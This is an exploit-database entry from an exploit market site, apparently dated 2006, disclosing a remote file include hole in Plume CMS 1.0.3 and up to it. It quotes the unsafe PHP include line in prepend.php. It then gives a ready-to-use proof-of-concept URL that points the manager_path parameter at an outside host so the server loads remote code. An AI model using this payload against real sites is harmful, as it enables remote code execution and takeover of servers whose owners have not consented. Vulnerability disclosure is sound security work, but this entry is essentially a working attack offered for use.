[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Plume CMS <= 1.0.3 (manager_path) Remote File Include Vulnerability

Author
beford
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-449
Category
web applications
Date add
25-05-2006
Platform
unsorted
===================================================================
Plume CMS <= 1.0.3 (manager_path) Remote File Include Vulnerability
===================================================================




Vendor: Plume CMS http://plume-cms.net
Vuln: Remote File Include
Discovered: beford <xbefordx gmail com>

Vulnerable File/Code

./plume-1.0.3/manager/frontinc/prepend.php

[code]
include_once $_PX_config['manager_path'].'/conf/config.php';
[/code]

http://urlanda.org/manager/frontinc/prepend.php?_PX_config[manager_path]=http://leet



#  0day.today [2024-09-28]  #